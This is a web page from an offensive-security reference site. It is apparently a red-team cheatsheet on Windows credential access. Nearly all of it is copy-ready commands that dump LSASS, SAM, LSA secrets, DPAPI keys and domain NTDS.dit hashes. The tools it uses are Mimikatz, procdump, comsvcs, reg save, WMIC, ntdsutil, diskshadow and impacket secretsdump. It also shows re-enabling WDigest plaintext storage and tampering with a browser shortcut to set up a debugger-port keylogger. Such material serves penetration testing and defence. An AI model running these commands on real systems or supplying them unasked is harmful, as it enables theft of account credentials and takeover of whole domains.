Clyde logo
Playbook
EmulatedCriminals
Back to all cheatsheets

Credential Access cheatsheet

Credential harvesting and dumping techniques commonly observed in real-world intrusions.

credentialsdumpingmimikatzred teamingpenetration testing

#Mimikatz

Check for Appropirate permissions

In most cases you must be NT\System to dump credentials. Especially if accessing the LSASS process.

privilege::debug
Dumping SAM/Local Accounts

Dump SAM

lsadump::sam

Dump Local System Accoutns (LSA)

lsadump::lsa
Dumping LSASS

Dump Cleartext / NTLM / Kerberos

sekurlsa::logonpasswords

Dump NTLM hashes only

sekurlsa::msv

Dump Kerberos tickets in memory

sekurlsa::kerberos

Dump credentials from a minidump

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Dump Domain Credentials (DCSync)

No LSASS interaction required. Relies on replication permissions.

lsadump::dcsync /domain:corp.local /user:krbtgt
Dump Cred Vaults / DPAPI

Dump DPAPI master keys

sekurlsa::dpapi

Chrome / browser secrets (context dependent)

dpapi::chrome
See:Mimikatz

#Windows Based Access and Dumps

Dump LSASS with Procdump
ⓘNote
Requires NT\System permissions
procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
Dump LSASS with Comsvcs
ⓘNote
Requires NT\System permissions
.\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full
See: MiniDump w/ COM+
Dump SAM via Registry

SAM

reg save HKLM\SAM sam.save

System

reg save HKLM\SYSTEM system.save

Combine using samdump2

samdump2 system sam
Dump SAM via Esentutl

esentutl is a Windows LoLBin

esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam
See: Dumping SAM
Dump LSA via Registry
reg save HKLM\SYSTEM system & reg save HKLM\security security

combine in mimikatz ran in remote machine

lsadump::secrets /system:c:\temp\system /security:c:\temp\security
Dump NTDS.dit Hashes Using WMIC - Credentials

Create a shadow copy of C

wmic /node:dc01 /user:administrator@domain /password:123456 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

Copy NTDS.dit SYSTEM and SECRURITY to C:\temp

wmic /node:dc01 /user:administrator@domain /password:123456 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"

Mount the shadow copy locally to retrieve the files

net use j: \\dc01\c$\temp /user:administrator 123456; dir j:\
Dump NTDS.dit Hashes Using ntdsutil
ⓘNote
This does not require credentials, but must at least have access to the DC.
ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q

dump hashes offline with impacket

secretsdump -system SYSTEM -security SECURITY -ntds ntds.dit local
Dump NTDS.dit Hashes Using diskshadow
ⓘNote
This does not require credentials, but must at least have access to the DC.

On DCs Windows server version 2008+ we can use diskshadow to grab the ntdis.dit

first we must create a diskshadow script to create a new copy of C:\ or where ever ntds.dit is located and expose it to a new drive

set context persistent nowriters
set metadata c:\exfil\metadata.cab
add volume c: alias trophy
create
expose %someAlias% z:

Then we excuse it

mkdir c:\exfil
diskshadow.exe /s C:\users\Administrator\Desktop\shadow.txt
cmd.exe /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
Dump NTDS.dit Hashes Using Impacket - Credentials
impacket-secretsdump -just-dc-ntlm domain/administrator@10.10.13.37
Credentials in Registry

Search Hive Key Local Machine for password

reg query HKLM /f password /t REG_SZ /s

Search Hive Key Current User for password

reg query HKCU /f password /t REG_SZ /s
Poison-The-Well WDigest

WDigest is a Security Support Provider within LSASS that stores crednetials in plain text. After Win8, by default WDigest is turned off on systems.

The registry still exists though and we can turn it on to force the credential store to be used again.

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Once turned on the next logon authentcation will begin populating the store

#Browser Based Access and Dumps

Chromium Poison-The-Well Debugger KeyLoger

This attack requires that you already have access to the host through a c2 system.

First you must poison the shortcut to make either Chrome or Edge start with a debugger port.

Normally this can be accomplished by changing the target to
"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222

If the browser is already running you can force a crash or wait until a new instance is started

Now import a script like SilentFrame or similar

Featured  Cheatsheets

Bash icon

Bash

Programming

Code Execution icon

Code Execution

Tactics, Techniques, and Procedures

Credential Access icon

Credential Access

Tactics, Techniques, and Procedures

Recent  Cheatsheets

Sandbox Detection/Evasion (Windows) icon

Sandbox Detection/Evasion (Windows)

2026-01-28

Shellcode Runners icon

Shellcode Runners

2026-01-26

Metasploit icon

Metasploit

2026-01-22

EC  Links

TB

The Briefing Room

Keep up to date on EC

EG

EC Github

Our public repo of research & projects

PG

Playbook Github

Contribute to Playbook

Clyde logo
EC Playbook
Quick Reference Ops

Quick reference cheatsheets for offensive security practitioners. Built by Emulated Criminals for field operators and learners.

Home
EmulatedCriminals
LinkedIn
© 2026 Emulated Criminals. All rights reserved.